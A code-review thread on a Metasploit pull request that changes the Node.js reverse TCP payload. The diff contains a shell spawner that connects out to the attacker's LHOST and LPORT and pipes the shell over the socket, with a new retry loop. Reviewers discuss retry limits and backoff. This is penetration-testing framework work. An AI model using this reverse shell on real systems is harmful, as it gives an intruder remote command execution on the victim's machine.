lib/msf/core/payload/nodejs.rb

```diff
@@ -56,16 +56,22 @@ def nodejs_reverse_tcp(opts={})
             util = require("util"),
             sh = cp.spawn(cmd, []);
         var client = this;
-        client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
-          client.socket.pipe(sh.stdin);
-          if (typeof util.pump === "undefined") {
-            sh.stdout.pipe(client.socket);
-            sh.stderr.pipe(client.socket);          
-          } else {
-            util.pump(sh.stdout, client.socket);
-            util.pump(sh.stderr, client.socket);
-          }
-        });
+	function StagerRepeat(){
+          client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
+            client.socket.pipe(sh.stdin);
+            if (typeof util.pump === "undefined") {
+              sh.stdout.pipe(client.socket);
+              sh.stderr.pipe(client.socket);          
+            } else {
+              util.pump(sh.stdout, client.socket);
+              util.pump(sh.stderr, client.socket);
+            }
+          });
+	  socket.on("error", function(error) {
+            StagerRepeat();
```

Comment:
MaxRetries should be taken into account, this will loop ad nauseum.

Reply:
The loop runs like around 30+ times per second. If a MaxRetry value is specified,  it will have to be in the range of ten thousands to keep the payload running for just a couple of minutes. @sempervictus

Reply:
This is doing a connect outbound, so having a backoff at the least should be added, a `MaxRetry` could then be set to a reasonable value as well.

Each `StagerRepeat()` can be called at least a few seconds apart and multiple failures in a row should extend the delay.

Reply:
I'm not very well accustomed to the nodejs predefined functions. Is there a similar function like time.sleep()  in node as there is in python?